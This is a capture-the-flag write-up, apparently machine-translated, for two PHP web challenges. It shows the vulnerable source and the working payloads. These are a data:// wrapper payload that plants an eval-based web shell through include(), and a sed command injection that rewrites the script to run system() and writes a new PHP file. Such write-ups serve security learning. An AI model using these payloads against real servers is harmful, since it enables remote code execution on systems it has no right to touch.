pass-01 web Sign in

<?php

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-03-19 12:10:55
# @Last Modified by:   h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: [email protected]
# @link: https://ctfer.com

error_reporting(0);
highlight_file(__FILE__);

$file = $_POST['file'];

if(isset($file)){
    if(strrev($file)==$file){
        include $file;
    }

}

See input parameters file The judgement item is strrev( reverse )== Normal admission

At first, I considered that weakness is equal to bypassing , however include No dice ,

Later I learned   2 A knowledge ,,

1. First, we can use data:// Fake protocol ,

2.php ?> The content after is no longer calculated

So it can be constructed as follows ：

file=data://text/plain,<?php eval($_REQUEST[1]);?>

adopt py The inversion structure is complete payload

  The sign in question is so difficult ？ Shouldn't the sign in question be the one with hands .

 PASS-02 easyPHP

<?php

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-03-19 12:10:55
# @Last Modified by:   h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: [email protected]
# @link: https://ctfer.com

error_reporting(0);
highlight_file(__FILE__);

$cmd = $_POST['cmd'];
$param = $_POST['param'];

if(isset($cmd) && isset($param)){
    $cmd=escapeshellcmd(substr($cmd,0,3))." ".escapeshellarg($param)." ".__FILE__;
    shell_exec($cmd);
}

escapeshell Used for filtering , The string length is limited to 3,

According to Daniel's experience Need to use sed Command new file , use sed Match parameter regularity for replacement modification

sed Regular expressions - sed Basic course - Simple tutorial , Simple programming

First, you need to use parameters ：

1. “/escap/d”    Among them d To delete escap The limit of the whole line

2. Using parameter “s/shell_exec/system/g” there s The purpose is to replace g The purpose of the parameter is to global ,

complete payload=“cmd=sed&param=/escapeshell/d;s/shell_exec/system/g;w 99.php”